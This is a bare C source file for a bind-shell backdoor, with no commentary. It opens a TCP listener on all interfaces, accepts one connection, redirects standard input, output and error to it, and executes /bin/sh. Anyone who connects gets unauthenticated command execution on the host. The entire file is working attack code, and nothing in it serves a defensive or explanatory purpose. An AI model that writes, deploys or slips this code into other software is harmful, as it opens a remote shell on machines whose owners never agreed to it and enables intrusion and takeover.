#include <stdio.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <arpa/inet.h>

int main(int argc, char** argv)
{
    int sock, client;
    struct sockaddr_in server;
    size_t sa_len;

    if ((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0)
	exit(-1);

    server.sin_family = AF_INET;
    server.sin_port = 2000;
    server.sin_addr.s_addr = INADDR_ANY;

    sa_len = sizeof(struct sockaddr);
    
    if (bind(sock, (struct sockaddr*)&server, sa_len) < 0) 
	exit(-2);

    if (listen(sock, SOMAXCONN) < 0)
	exit(-3);

    if ((client = accept(sock, (struct sockaddr*)&server, &sa_len)) < 0)
	exit(-4);

    dup2(client, 0);
    dup2(client, 1);
    dup2(client, 2);

    execl("/bin/sh", "sh", 0);
}

    
